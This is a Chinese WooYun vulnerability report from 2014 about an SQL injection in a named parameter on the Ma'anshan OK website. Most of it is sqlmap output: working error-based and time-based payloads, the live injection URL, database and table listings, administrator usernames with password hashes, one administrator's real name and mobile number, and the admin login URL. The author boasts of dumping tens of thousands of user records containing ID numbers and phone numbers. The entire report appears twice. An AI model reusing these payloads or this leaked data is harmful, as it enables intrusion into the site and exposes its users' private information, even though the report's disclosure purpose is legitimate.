当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082243

漏洞标题:马鞍山OK网某处SQL注入导致数个模块沦陷(用户信息泄露)

相关厂商:马鞍山OK网

漏洞作者: an0nym0u5

提交时间:2014-11-07 10:18

修复时间:2014-12-22 10:22

公开时间:2014-12-22 10:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

该论坛一处SQL注入,导致交友、招聘、团购等多个分站直接拖库,用户数据泄漏。

详细说明:

马鞍山ok网:http://www.masok.cn/

mas1.jpg


注入点:
http://tuan.masok.cn/index.php?m=Rss&a=index&cityname=maanshan
注入参数:cityname
跑一下库吧先:
GET parameter 'cityname' is vulnerable. Do you want to keep testing the others?
[y/N]
sqlmap identified the following injection points with a total of 315 HTTP(s) req
uests:
---
Place: GET
Parameter: cityname
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=Rss&a=index&cityname=maanshan' AND (SELECT 6840 FROM(SELECT COUNT
(*),CONCAT(CHAR(58,121,106,114,58),(SELECT (CASE WHEN (6840=6840) THEN 1 ELSE 0
END)),CHAR(58,111,120,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables
GROUP BY x)a) AND 'UWyf'='UWyf
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=Rss&a=index&cityname=maanshan' AND SLEEP(5) AND 'nGvl'='nGvl
---
[09:19:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[09:19:02] [INFO] fetching database names
[09:19:02] [INFO] the SQL query used returns 9 entries
[09:19:02] [INFO] retrieved: information_schema
[09:19:02] [INFO] retrieved: love
[09:19:03] [INFO] retrieved: masjob
[09:19:03] [INFO] retrieved: mysql
[09:19:03] [INFO] retrieved: performance_schema
[09:19:03] [INFO] retrieved: test
[09:19:03] [INFO] retrieved: tuangou
[09:19:03] [INFO] retrieved: ultrax
[09:19:04] [INFO] retrieved: ultrax_20140721
available databases [9]:
[*] information_schema
[*] love
[*] masjob
[*] mysql
[*] performance_schema
[*] test
[*] tuangou
[*] ultrax
[*] ultrax_20140721
得到如下数据库,各个具有魅力啊,一个一个来。

mas2.png


看看love数据库有啥,这明显是个交友板块的数据库:
Database: love
[94 tables]
+--------------------------+
| oepre_admin |
| oepre_area |
| oepre_ask |
| oepre_ask_answer |
| oepre_ask_category |
| oepre_authgroup |
| oepre_ceshi_category |
| oepre_ceshi_comment |
| oepre_ceshi_content |
| oepre_ceshi_record |
| oepre_ceshi_subject |
| oepre_ceshi_truerate |
| oepre_complaints |
| oepre_dating |
| oepre_dating_category |
| oepre_dating_cond |
| oepre_dating_user |
| oepre_diary |
| oepre_diary_category |
| oepre_diary_comment |
| oepre_friend |
| oepre_gift |
| oepre_gift_category |
| oepre_gift_record |
| oepre_greet |
| oepre_hibox |
| oepre_home_payalbum |
| oepre_home_paycontact |
| oepre_home_payvideo |
| oepre_home_viewer |
| oepre_hometown |
| oepre_htmllabel |
| oepre_info |
| oepre_info_category |
| oepre_lang |
| oepre_log |
| oepre_love_paramter |
| oepre_love_sort |
| oepre_mail_content |
| oepre_mail_log |
| oepre_mail_tpl |
| oepre_message |
| oepre_message_allow |
| oepre_message_daysends |
| oepre_message_dayviews |
| oepre_message_hash |
| oepre_mobile_checkcode |
| oepre_myads |
| oepre_oauth |
| oepre_oauth_user |
| oepre_options |
| oepre_party |
| oepre_party_cancel |
| oepre_party_comment |
| oepre_party_signup |
| oepre_payment |
| oepre_payment_log |
| oepre_payment_plugin |
| oepre_promotion |
| oepre_promotion_settle |
| oepre_seo |
| oepre_single |
| oepre_single_category |
| oepre_sms_content |
| oepre_sms_log |
| oepre_sms_tpl |
| oepre_story |
| oepre_story_category |
| oepre_story_comment |
| oepre_system_content |
| oepre_system_msg |
| oepre_user |
| oepre_user_attr |
| oepre_user_certify |
| oepre_user_cond |
| oepre_user_group |
| oepre_user_logins |
| oepre_user_match |
| oepre_user_mbsms |
| oepre_user_money |
| oepre_user_online |
| oepre_user_params |
| oepre_user_photo |
| oepre_user_points |
| oepre_user_profile |
| oepre_user_status |
| oepre_user_validate |
| oepre_user_video |
| oepre_user_video_comment |
| oepre_user_videorz |
| oepre_user_viprecord |
| oepre_weibo |
| oepre_weibo_comment |
| oepre_zone |
+--------------------------+
oepre_admin、oepre_user 这几个表是不是很吸引人?继续看:
Database: love
Table: oepre_admin
[11 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| adminid | mediumint(8) unsigned |
| adminname | varchar(50) |
| flag | tinyint(1) unsigned |
| groupid | mediumint(8) unsigned |
| loginip | varchar(50) |
| logintimeline | int(10) unsigned |
| logintimes | int(10) unsigned |
| memo | varchar(500) |
| password | varchar(50) |
| super | tinyint(1) unsigned |
| timeline | int(10) unsigned |
+---------------+-----------------------+
看到啥啦?adminname和password 。继续拿到管理员帐号密码:
Database: love
Table: oepre_admin
[4 entries]
+-----------+----------------------------------+
| adminname | password |
+-----------+----------------------------------+
| admin | 12914125d9407721c741e3dff2fe04b2 |
| OK红娘 | 705e6d888f55980773a11dd588c4739e |
| 蝴蝶飞飞 | 7d6a0bde9a6f886d18dcaff38c2805fc |
| 文言文语 | b6de6cb121aabea28282d82549713b0a |
+-----------+----------------------------------+
再看看普通用户:
Database: love
Table: oepre_user
[13 columns]
+------------+------------------------+
| Column | Type |
+------------+------------------------+
| avatar | varchar(200) |
| avatarflag | tinyint(1) unsigned |
| email | varchar(100) |
| gender | tinyint(1) unsigned |
| groupid | smallint(2) unsigned |
| integrity | tinyint(1) unsigned |
| mbsms | mediumint(8) unsigned |
| money | decimal(18,2) unsigned |
| password | varchar(32) |
| points | decimal(18,2) unsigned |
| salt | varchar(10) |
| userid | int(10) unsigned |
| username | varchar(20) |
+------------+------------------------+
还是有username,password 真是令人兴奋啊。
[09:29:32] [INFO] the SQL query used returns 3020 entries
用户量也不算小。进一步拿到用户的帐号密码,展示部分截图:

mas3.png


下边是excel里边的一部分截图:

mas4.jpg


mas5.jpg


再看另外一个数据库masjob,这应该是招聘的:
Database: masjob
[104 tables]
+---------------------+
| job_ad |
| job_admin |
| job_adplace |
| job_adsplace |
| job_announce |
| job_attention |
| job_building |
| job_card |
| job_channel |
| job_comment |
| job_common |
| job_comnews |
| job_consume |
| job_count |
| job_countnum |
| job_course |
| job_coursetype |
| job_crons |
| job_department |
| job_dept |
| job_downfiles |
| job_downtype |
| job_dynamic |
| job_ecoclass |
| job_edu |
| job_education |
| job_evalua |
| job_feval |
| job_foreigndegree |
| job_foreignlanguage |
| job_gift |
| job_gift_category |
| job_gift_orders |
| job_group |
| job_guestbook |
| job_help |
| job_helpsort |
| job_hire |
| job_hrzp |
| job_interview |
| job_label |
| job_lang |
| job_letter |
| job_level |
| job_links |
| job_location |
| job_mail |
| job_mail_list |
| job_mail_log |
| job_mail_server |
| job_mailtemp |
| job_mamber_subinfo |
| job_manage_log |
| job_marriage |
| job_member |
| job_mutual |
| job_myexpert |
| job_myfavorite |
| job_myinterview |
| job_myreceive |
| job_mysend |
| job_nation |
| job_news |
| job_newssort |
| job_orderservice |
| job_pay |
| job_payback |
| job_payonline |
| job_picture |
| job_plus_weblog |
| job_polity |
| job_position |
| job_prices |
| job_profession |
| job_professor |
| job_provinceandcity |
| job_rbrower |
| job_recycle |
| job_reply |
| job_require |
| job_resume |
| job_rule_news |
| job_rule_office |
| job_save_url |
| job_sendresume |
| job_service_log |
| job_signup |
| job_site |
| job_siteconfig |
| job_sms |
| job_smstemp |
| job_street |
| job_student |
| job_sysletter |
| job_trade |
| job_trainer |
| job_training |
| job_url |
| job_vhire |
| job_vote |
| job_vresume |
| job_work |
| job_zph |
| job_zphorder |
+---------------------+
job_admin表是管理员表啦:
Database: masjob
Table: job_admin
[12 columns]
+----------+------------------+
| Column | Type |
+----------+------------------+
| a_flag | varchar(8000) |
| a_flags | varchar(20) |
| a_id | int(10) unsigned |
| a_kf | tinyint(1) |
| a_mobile | varchar(15) |
| a_name | varchar(20) |
| a_pass | varchar(32) |
| a_qq | varchar(12) |
| a_site | smallint(4) |
| a_tel | varchar(20) |
| a_type | varchar(20) |
| a_user | varchar(20) |
+----------+------------------+
哇,有姓名,用户名,密码,手机号,qq号,应有尽有,挖出来看看:
Database: masjob
Table: job_admin
[3 entries]
+-------------+--------+----------------------------------+------+--------+
| a_mobile | a_name | a_pass | a_qq | a_user |
+-------------+--------+----------------------------------+------+--------+
| 13855570144 | 刘治国 | 2bb5f77d14939c74db4ed9cfae091278 | None | dyslzg |
| None | 明星 | 5ecd2f5496def504f882ebfa438512bd | None | limgxg |
| None | None | f9a77f1c4a055a793c65592fcf98cb73 | None | wumf |
+-------------+--------+----------------------------------+------+--------+
测试一下:用户名:dyslzg 密码可以破解,这里不列出。
后台地址:http://job.masok.cn/admin/

mas8.jpg


mas9.jpg


再看看成员,job_member 表:
Database: masjob
Table: job_member
[99 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| m_activedate | datetime |
| m_address | varchar(200) |
| m_answer | varchar(50) |
| m_balance | int(10) |
| m_birth | date |
| m_bold | tinyint(1) |
| m_brand | varchar(100) |
| m_building | varchar(20) |
| m_cardtype | tinyint(1) |
| m_chat | varchar(20) |
| m_color | varchar(7) |
| m_comm | tinyint(1) |
| m_commend | date |
| m_commstart | date |
| m_confirm | tinyint(1) |
| m_contact | varchar(50) |
| m_contactnum | smallint(4) |
| m_contactnums | mediumint(6) |
| m_ecoclass | varchar(20) |
| m_edu | tinyint(2) |
| m_email | varchar(100) |
| m_emailauth | tinyint(1) |
| m_emailshowflag | tinyint(1) |
| m_enddate | date |
| m_expertnum | smallint(4) |
| m_expertnums | mediumint(6) |
| m_fax | varchar(50) |
| m_flag | tinyint(1) |
| m_founddate | date |
| m_fund | mediumint(6) |
| m_groupid | tinyint(2) |
| m_hirenum | smallint(4) |
| m_hirenums | mediumint(6) |
| m_hits | int(10) |
| m_hukou | varchar(100) |
| m_id | int(10) unsigned |
| m_idcard | varchar(20) |
| m_integral | int(10) |
| m_interviewnums | mediumint(6) |
| m_introduce | mediumtext |
| m_inviteid | int(10) unsigned |
| m_ishire | smallint(4) |
| m_lastlogindate | int(10) unsigned |
| m_letternums | tinyint(2) |
| m_level | varchar(50) |
| m_licence | varchar(100) |
| m_limit | varchar(255) |
| m_login | varchar(50) |
| m_logindate | datetime |
| m_loginip | varchar(15) |
| m_loginnum | int(10) |
| m_logo | varchar(50) |
| m_logocomm | tinyint(1) |
| m_logoenddate | date |
| m_logoflag | tinyint(1) |
| m_logostartdate | date |
| m_logostatus | tinyint(1) |
| m_map | varchar(50) |
| m_marriage | varchar(10) |
| m_mobile | varchar(20) |
| m_mobileauth | tinyint(1) |
| m_mobileshowflag | tinyint(1) |
| m_myfavoritenum | smallint(4) |
| m_myfavoritenums | mediumint(6) |
| m_myinterviewnum | smallint(4) |
| m_myinterviewnums | mediumint(6) |
| m_mysendnum | smallint(4) |
| m_mysendnums | mediumint(6) |
| m_name | varchar(200) |
| m_nameshow | tinyint(1) |
| m_openid | varchar(100) |
| m_operator | varchar(20) |
| m_otherwelfare | varchar(100) |
| m_polity | varchar(10) |
| m_post | varchar(6) |
| m_pwd | varchar(32) |
| m_question | varchar(50) |
| m_qzstate | varchar(255) |
| m_recyclenum | smallint(4) |
| m_recyclenums | mediumint(6) |
| m_regdate | datetime |
| m_resumenums | mediumint(6) |
| m_seat | varchar(100) |
| m_sendemail | tinyint(1) |
| m_sex | tinyint(1) |
| m_site | smallint(4) |
| m_smsnum | smallint(4) |
| m_smsnums | mediumint(6) |
| m_startdate | date |
| m_street | varchar(20) |
| m_subtype | varchar(50) |
| m_tel | varchar(100) |
| m_telshowflag | tinyint(1) |
| m_template | varchar(20) |
| m_trade | varchar(50) |
| m_typeid | tinyint(1) |
| m_url | varchar(100) |
| m_welfare | varchar(255) |
| m_workers | varchar(10) |
+-------------------+------------------+
成员的详细信息都在其中,比如m_address、m_birth、m_contactnum、m_email 、m_hukou、m_idcard、m_mobile、m_login、m_name 、m_pwd 、m_tel、包括姓名、密码、身份证号、户口、手机号、生日等等。
[10:02:02] [INFO] the SQL query used returns 30130 entries
可以看出用户量更大,达3万多。详细信息尽在眼前。
部分截图如下:

mas6.jpg


mas7.jpg


最后所有信息自动生成excel。拿到这些能干啥大家都懂的。
tuangou库也是一样的啦,应该是团购板块吧。这里省略。。

漏洞证明:

马鞍山ok网:http://www.masok.cn/

mas1.jpg


注入点:
http://tuan.masok.cn/index.php?m=Rss&a=index&cityname=maanshan
注入参数:cityname 已经拖库。
跑一下库吧先:
GET parameter 'cityname' is vulnerable. Do you want to keep testing the others?
[y/N]
sqlmap identified the following injection points with a total of 315 HTTP(s) req
uests:
---
Place: GET
Parameter: cityname
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=Rss&a=index&cityname=maanshan' AND (SELECT 6840 FROM(SELECT COUNT
(*),CONCAT(CHAR(58,121,106,114,58),(SELECT (CASE WHEN (6840=6840) THEN 1 ELSE 0
END)),CHAR(58,111,120,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables
GROUP BY x)a) AND 'UWyf'='UWyf
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=Rss&a=index&cityname=maanshan' AND SLEEP(5) AND 'nGvl'='nGvl
---
[09:19:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[09:19:02] [INFO] fetching database names
[09:19:02] [INFO] the SQL query used returns 9 entries
[09:19:02] [INFO] retrieved: information_schema
[09:19:02] [INFO] retrieved: love
[09:19:03] [INFO] retrieved: masjob
[09:19:03] [INFO] retrieved: mysql
[09:19:03] [INFO] retrieved: performance_schema
[09:19:03] [INFO] retrieved: test
[09:19:03] [INFO] retrieved: tuangou
[09:19:03] [INFO] retrieved: ultrax
[09:19:04] [INFO] retrieved: ultrax_20140721
available databases [9]:
[*] information_schema
[*] love
[*] masjob
[*] mysql
[*] performance_schema
[*] test
[*] tuangou
[*] ultrax
[*] ultrax_20140721
得到如下数据库,各个具有魅力啊,一个一个来。

mas2.png


看看love数据库有啥,这明显是个交友板块的数据库:
Database: love
[94 tables]
+--------------------------+
| oepre_admin |
| oepre_area |
| oepre_ask |
| oepre_ask_answer |
| oepre_ask_category |
| oepre_authgroup |
| oepre_ceshi_category |
| oepre_ceshi_comment |
| oepre_ceshi_content |
| oepre_ceshi_record |
| oepre_ceshi_subject |
| oepre_ceshi_truerate |
| oepre_complaints |
| oepre_dating |
| oepre_dating_category |
| oepre_dating_cond |
| oepre_dating_user |
| oepre_diary |
| oepre_diary_category |
| oepre_diary_comment |
| oepre_friend |
| oepre_gift |
| oepre_gift_category |
| oepre_gift_record |
| oepre_greet |
| oepre_hibox |
| oepre_home_payalbum |
| oepre_home_paycontact |
| oepre_home_payvideo |
| oepre_home_viewer |
| oepre_hometown |
| oepre_htmllabel |
| oepre_info |
| oepre_info_category |
| oepre_lang |
| oepre_log |
| oepre_love_paramter |
| oepre_love_sort |
| oepre_mail_content |
| oepre_mail_log |
| oepre_mail_tpl |
| oepre_message |
| oepre_message_allow |
| oepre_message_daysends |
| oepre_message_dayviews |
| oepre_message_hash |
| oepre_mobile_checkcode |
| oepre_myads |
| oepre_oauth |
| oepre_oauth_user |
| oepre_options |
| oepre_party |
| oepre_party_cancel |
| oepre_party_comment |
| oepre_party_signup |
| oepre_payment |
| oepre_payment_log |
| oepre_payment_plugin |
| oepre_promotion |
| oepre_promotion_settle |
| oepre_seo |
| oepre_single |
| oepre_single_category |
| oepre_sms_content |
| oepre_sms_log |
| oepre_sms_tpl |
| oepre_story |
| oepre_story_category |
| oepre_story_comment |
| oepre_system_content |
| oepre_system_msg |
| oepre_user |
| oepre_user_attr |
| oepre_user_certify |
| oepre_user_cond |
| oepre_user_group |
| oepre_user_logins |
| oepre_user_match |
| oepre_user_mbsms |
| oepre_user_money |
| oepre_user_online |
| oepre_user_params |
| oepre_user_photo |
| oepre_user_points |
| oepre_user_profile |
| oepre_user_status |
| oepre_user_validate |
| oepre_user_video |
| oepre_user_video_comment |
| oepre_user_videorz |
| oepre_user_viprecord |
| oepre_weibo |
| oepre_weibo_comment |
| oepre_zone |
+--------------------------+
oepre_admin、oepre_user 这几个表是不是很吸引人?继续看:
Database: love
Table: oepre_admin
[11 columns]
+---------------+-----------------------+
| Column | Type |
+---------------+-----------------------+
| adminid | mediumint(8) unsigned |
| adminname | varchar(50) |
| flag | tinyint(1) unsigned |
| groupid | mediumint(8) unsigned |
| loginip | varchar(50) |
| logintimeline | int(10) unsigned |
| logintimes | int(10) unsigned |
| memo | varchar(500) |
| password | varchar(50) |
| super | tinyint(1) unsigned |
| timeline | int(10) unsigned |
+---------------+-----------------------+
看到啥啦?adminname和password 。继续拿到管理员帐号密码:
Database: love
Table: oepre_admin
[4 entries]
+-----------+----------------------------------+
| adminname | password |
+-----------+----------------------------------+
| admin | 12914125d9407721c741e3dff2fe04b2 |
| OK红娘 | 705e6d888f55980773a11dd588c4739e |
| 蝴蝶飞飞 | 7d6a0bde9a6f886d18dcaff38c2805fc |
| 文言文语 | b6de6cb121aabea28282d82549713b0a |
+-----------+----------------------------------+
再看看普通用户:
Database: love
Table: oepre_user
[13 columns]
+------------+------------------------+
| Column | Type |
+------------+------------------------+
| avatar | varchar(200) |
| avatarflag | tinyint(1) unsigned |
| email | varchar(100) |
| gender | tinyint(1) unsigned |
| groupid | smallint(2) unsigned |
| integrity | tinyint(1) unsigned |
| mbsms | mediumint(8) unsigned |
| money | decimal(18,2) unsigned |
| password | varchar(32) |
| points | decimal(18,2) unsigned |
| salt | varchar(10) |
| userid | int(10) unsigned |
| username | varchar(20) |
+------------+------------------------+
还是有username,password 真是令人兴奋啊。
[09:29:32] [INFO] the SQL query used returns 3020 entries
用户量也不算小。进一步拿到用户的帐号密码,展示部分截图:

mas3.png


下边是excel里边的一部分截图:

mas4.jpg


mas5.jpg


再看另外一个数据库masjob,这应该是招聘的:
Database: masjob
[104 tables]
+---------------------+
| job_ad |
| job_admin |
| job_adplace |
| job_adsplace |
| job_announce |
| job_attention |
| job_building |
| job_card |
| job_channel |
| job_comment |
| job_common |
| job_comnews |
| job_consume |
| job_count |
| job_countnum |
| job_course |
| job_coursetype |
| job_crons |
| job_department |
| job_dept |
| job_downfiles |
| job_downtype |
| job_dynamic |
| job_ecoclass |
| job_edu |
| job_education |
| job_evalua |
| job_feval |
| job_foreigndegree |
| job_foreignlanguage |
| job_gift |
| job_gift_category |
| job_gift_orders |
| job_group |
| job_guestbook |
| job_help |
| job_helpsort |
| job_hire |
| job_hrzp |
| job_interview |
| job_label |
| job_lang |
| job_letter |
| job_level |
| job_links |
| job_location |
| job_mail |
| job_mail_list |
| job_mail_log |
| job_mail_server |
| job_mailtemp |
| job_mamber_subinfo |
| job_manage_log |
| job_marriage |
| job_member |
| job_mutual |
| job_myexpert |
| job_myfavorite |
| job_myinterview |
| job_myreceive |
| job_mysend |
| job_nation |
| job_news |
| job_newssort |
| job_orderservice |
| job_pay |
| job_payback |
| job_payonline |
| job_picture |
| job_plus_weblog |
| job_polity |
| job_position |
| job_prices |
| job_profession |
| job_professor |
| job_provinceandcity |
| job_rbrower |
| job_recycle |
| job_reply |
| job_require |
| job_resume |
| job_rule_news |
| job_rule_office |
| job_save_url |
| job_sendresume |
| job_service_log |
| job_signup |
| job_site |
| job_siteconfig |
| job_sms |
| job_smstemp |
| job_street |
| job_student |
| job_sysletter |
| job_trade |
| job_trainer |
| job_training |
| job_url |
| job_vhire |
| job_vote |
| job_vresume |
| job_work |
| job_zph |
| job_zphorder |
+---------------------+
job_admin表是管理员表啦:
Database: masjob
Table: job_admin
[12 columns]
+----------+------------------+
| Column | Type |
+----------+------------------+
| a_flag | varchar(8000) |
| a_flags | varchar(20) |
| a_id | int(10) unsigned |
| a_kf | tinyint(1) |
| a_mobile | varchar(15) |
| a_name | varchar(20) |
| a_pass | varchar(32) |
| a_qq | varchar(12) |
| a_site | smallint(4) |
| a_tel | varchar(20) |
| a_type | varchar(20) |
| a_user | varchar(20) |
+----------+------------------+
哇,有姓名,用户名,密码,手机号,qq号,应有尽有,挖出来看看:
Database: masjob
Table: job_admin
[3 entries]
+-------------+--------+----------------------------------+------+--------+
| a_mobile | a_name | a_pass | a_qq | a_user |
+-------------+--------+----------------------------------+------+--------+
| 13855570144 | 刘治国 | 2bb5f77d14939c74db4ed9cfae091278 | None | dyslzg |
| None | 明星 | 5ecd2f5496def504f882ebfa438512bd | None | limgxg |
| None | None | f9a77f1c4a055a793c65592fcf98cb73 | None | wumf |
+-------------+--------+----------------------------------+------+--------+
测试一下:用户名:dyslzg 密码可以破解,这里不列出。
后台地址:http://job.masok.cn/admin/

mas8.jpg


mas9.jpg


再看看成员,job_member 表:
Database: masjob
Table: job_member
[99 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| m_activedate | datetime |
| m_address | varchar(200) |
| m_answer | varchar(50) |
| m_balance | int(10) |
| m_birth | date |
| m_bold | tinyint(1) |
| m_brand | varchar(100) |
| m_building | varchar(20) |
| m_cardtype | tinyint(1) |
| m_chat | varchar(20) |
| m_color | varchar(7) |
| m_comm | tinyint(1) |
| m_commend | date |
| m_commstart | date |
| m_confirm | tinyint(1) |
| m_contact | varchar(50) |
| m_contactnum | smallint(4) |
| m_contactnums | mediumint(6) |
| m_ecoclass | varchar(20) |
| m_edu | tinyint(2) |
| m_email | varchar(100) |
| m_emailauth | tinyint(1) |
| m_emailshowflag | tinyint(1) |
| m_enddate | date |
| m_expertnum | smallint(4) |
| m_expertnums | mediumint(6) |
| m_fax | varchar(50) |
| m_flag | tinyint(1) |
| m_founddate | date |
| m_fund | mediumint(6) |
| m_groupid | tinyint(2) |
| m_hirenum | smallint(4) |
| m_hirenums | mediumint(6) |
| m_hits | int(10) |
| m_hukou | varchar(100) |
| m_id | int(10) unsigned |
| m_idcard | varchar(20) |
| m_integral | int(10) |
| m_interviewnums | mediumint(6) |
| m_introduce | mediumtext |
| m_inviteid | int(10) unsigned |
| m_ishire | smallint(4) |
| m_lastlogindate | int(10) unsigned |
| m_letternums | tinyint(2) |
| m_level | varchar(50) |
| m_licence | varchar(100) |
| m_limit | varchar(255) |
| m_login | varchar(50) |
| m_logindate | datetime |
| m_loginip | varchar(15) |
| m_loginnum | int(10) |
| m_logo | varchar(50) |
| m_logocomm | tinyint(1) |
| m_logoenddate | date |
| m_logoflag | tinyint(1) |
| m_logostartdate | date |
| m_logostatus | tinyint(1) |
| m_map | varchar(50) |
| m_marriage | varchar(10) |
| m_mobile | varchar(20) |
| m_mobileauth | tinyint(1) |
| m_mobileshowflag | tinyint(1) |
| m_myfavoritenum | smallint(4) |
| m_myfavoritenums | mediumint(6) |
| m_myinterviewnum | smallint(4) |
| m_myinterviewnums | mediumint(6) |
| m_mysendnum | smallint(4) |
| m_mysendnums | mediumint(6) |
| m_name | varchar(200) |
| m_nameshow | tinyint(1) |
| m_openid | varchar(100) |
| m_operator | varchar(20) |
| m_otherwelfare | varchar(100) |
| m_polity | varchar(10) |
| m_post | varchar(6) |
| m_pwd | varchar(32) |
| m_question | varchar(50) |
| m_qzstate | varchar(255) |
| m_recyclenum | smallint(4) |
| m_recyclenums | mediumint(6) |
| m_regdate | datetime |
| m_resumenums | mediumint(6) |
| m_seat | varchar(100) |
| m_sendemail | tinyint(1) |
| m_sex | tinyint(1) |
| m_site | smallint(4) |
| m_smsnum | smallint(4) |
| m_smsnums | mediumint(6) |
| m_startdate | date |
| m_street | varchar(20) |
| m_subtype | varchar(50) |
| m_tel | varchar(100) |
| m_telshowflag | tinyint(1) |
| m_template | varchar(20) |
| m_trade | varchar(50) |
| m_typeid | tinyint(1) |
| m_url | varchar(100) |
| m_welfare | varchar(255) |
| m_workers | varchar(10) |
+-------------------+------------------+
成员的详细信息都在其中,比如m_address、m_birth、m_contactnum、m_email 、m_hukou、m_idcard、m_mobile、m_login、m_name 、m_pwd 、m_tel、包括姓名、密码、身份证号、户口、手机号、生日等等。
[10:02:02] [INFO] the SQL query used returns 30130 entries
可以看出用户量更大,达3万多。详细信息尽在眼前。
部分截图如下:

mas6.jpg


mas7.jpg


最后所有信息自动生成excel。拿到这些能干啥大家都懂的。
tuangou库也是一样的啦,应该是团购板块吧。这里省略。。

修复方案:

参数过滤

版权声明:转载请注明来源 an0nym0u5@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝